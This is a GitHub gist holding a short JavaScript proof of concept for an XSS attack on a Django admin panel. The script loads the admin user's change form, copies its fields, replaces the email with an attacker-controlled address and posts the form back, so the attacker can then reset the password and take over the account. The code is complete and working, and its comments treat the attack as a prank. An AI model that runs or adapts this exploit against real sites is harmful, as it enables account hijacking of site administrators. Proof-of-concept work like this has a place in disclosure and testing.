Created
February 15, 2017 11:33
-
-
Save gipi/2c12a7d76f0d45af0fa3421f748295f0 to your computer and use it in GitHub Desktop.
#poc #django #js #vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * POC for XSS vulnerability | |
| * | |
| * Simply parse the change form for the admin user and change the email. | |
| * The attacker needs, after this has run successful, to reset the password using | |
| * the email indicated in the script. | |
| */ | |
| url = '/auth/user/1/change/' | |
| url_reset_passwd = '/password_change/' | |
| evil_email = '[email protected]' | |
| // get the values | |
| function get_default(idx) { | |
| $element = $(this); | |
| attrname = $element.attr('name'); | |
| value = $element.val(); | |
| opts[attrname] = value; | |
| console.log(attrname); | |
| } | |
| // get the editing page | |
| response = $.ajax(url, { | |
| success: function (data, testStatus, xhr){ | |
| pwn(data); | |
| } | |
| }) | |
| // this is called when the GET returns with success | |
| function pwn(response) { | |
| $response = $(response) | |
| $form = $($response.find('form')[1]) | |
| console.log($form); | |
| // fields for POSTing | |
| opts = {} | |
| // with a JQuery magic get the default value | |
| $form.find('input').each(get_default) | |
| // i'm twelve, what's this? | |
| opts['email'] = evil_email; | |
| console.log(opts) | |
| // ??? profit | |
| $.post(url, opts) | |
| console.log(' [+] pwned') | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment